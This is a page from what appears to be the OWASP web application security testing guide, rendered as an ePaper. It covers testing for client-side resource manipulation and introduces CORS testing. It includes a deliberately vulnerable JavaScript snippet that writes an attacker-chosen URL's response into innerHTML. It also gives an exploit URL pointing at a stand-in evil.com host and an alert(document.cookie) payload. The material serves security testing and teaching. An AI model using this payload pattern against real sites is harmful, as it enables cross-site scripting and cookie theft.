4.0
1NSchAb
1NSchAb
- No tags were found...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
194<br />
Web Application Penetration Testing<br />
<br />
function createCORSRequest(method, url) {<br />
var xhr = new XMLHttpRequest();<br />
xhr.open(method, url, true);<br />
xhr.onreadystatechange = function () {<br />
if (this.status == 200 && this.readyState == 4) {<br />
document.getElementById(‘p’).innerHTML = this.responseText;<br />
}<br />
};<br />
return xhr;<br />
}<br />
var xhr = createCORSRequest(‘GET’, location.hash.slice(1));<br />
xhr.send(null);<br />
<br />
The “location.hash” is controlled by the attacker and it is used for<br />
requesting an external resource, which will be reflected through<br />
the construct “innerHTML”. Basically the attacker could ask the<br />
victim to visit the following URL and at the same time he could<br />
craft the payload handler.<br />
Exploit URL: www.victim.com/#http://evil.com/html.html<br />
http: /evil.com/html.html<br />
----<br />
<br />
alert(document.cookie);<br />
Black Box testing<br />
Black box testing for Client Side Resource Manipulation is not<br />
usually performed since access to the source code is always<br />
available as it needs to be sent to the client to be executed.<br />
Gray Box testing<br />
Testing for Client Side Resource Manipulation vulnerabilities:<br />
To manually check for this type of vulnerability we have to identify<br />
whether the application employs inputs without correctly<br />
validating them; these are under the control of the user which<br />
could be able to specify the url of some resources. Since there<br />
are many resources that could be included into the application<br />
(for example images, video, object, css, frames etc.), client side<br />
scripts which handle the associated URLs should be investigated<br />
for potential issues.<br />
The following table shows the possible injection points (sink)<br />
that should be checked:<br />
Resource<br />
Frame<br />
Link<br />
AJAX Request<br />
CSS<br />
Tag/Method<br />
iframe<br />
a<br />
xhr.open(method, [url], true);<br />
link<br />
Sink<br />
src<br />
href<br />
URL<br />
href<br />
Resource<br />
Image<br />
Object<br />
Script<br />
Tag/Method<br />
img<br />
object<br />
script<br />
Sink<br />
src<br />
data<br />
The most interesting ones are those that allow to an attacker<br />
to include client side code (for example JavaScript) since it could<br />
lead to an XSS vulnerabilities.<br />
When trying to check for this kind of issues, consider that some<br />
characters are treated differently by different browsers. Moreover<br />
always consider the possibility to try absolute URLs variants<br />
as described here: http://kotowicz.net/absolute/<br />
Tools<br />
• DOMinator - https://dominator.mindedsecurity.com/<br />
References<br />
OWASP Resources<br />
• DOM based XSS Prevention Cheat Sheet<br />
• DOMXSS.com - http://www.domxss.com<br />
• DOMXSS TestCase - http://www.domxss.com/domxss/01<br />
Basics/04_script_src.html<br />
Whitepapers<br />
• DOM XSS Wiki - https://code.google.com/p/domxsswiki/wiki<br />
LocationSources<br />
• Krzysztof Kotowicz: “Local or External? Weird URL formats on<br />
the loose” - http://kotowicz.net/absolute/<br />
Test Cross Origin Resource Sharing<br />
(OTG-CLIENT-007)<br />
Summary<br />
Cross Origin Resource Sharing or CORS is a mechanism that enables<br />
a web browser to perform “cross-domain” requests using<br />
the XMLHttpRequest L2 API in a controlled manner. In the past,<br />
the XMLHttpRequest L1 API only allowed requests to be sent<br />
within the same origin as it was restricted by the same origin<br />
policy.<br />
Cross-Origin requests have an Origin header, that identifies the<br />
domain initiating the request and is always sent to the server.<br />
CORS defines the protocol to use between a web browser and a<br />
server to determine whether a cross-origin request is allowed.<br />
In order to accomplish this goal, there are a few HTTP headers<br />
involved in this process, that are supported by all major browsers<br />
and we will cover below including: Origin, Access-Control-Request-Method,<br />
Access-Control-Request-Headers, Access-Control-Allow-Origin,<br />
Access-Control-Allow-Credentials,<br />
Access-Control-Allow-Methods, Access-Control-Allow-Headers.<br />
The CORS specification mandates that for non simple requests,<br />
such as requests other than GET or POST or requests that uses<br />
credentials, a pre-flight OPTIONS request must be sent in advance<br />
to check if the type of request will have a bad impact on<br />
the data. The pre-flight request checks the methods, headers<br />
allowed by the server, and if credentials are permitted, based on<br />
the result of the OPTIONS request, the browser decides whether<br />
the request is allowed or not.<br />
src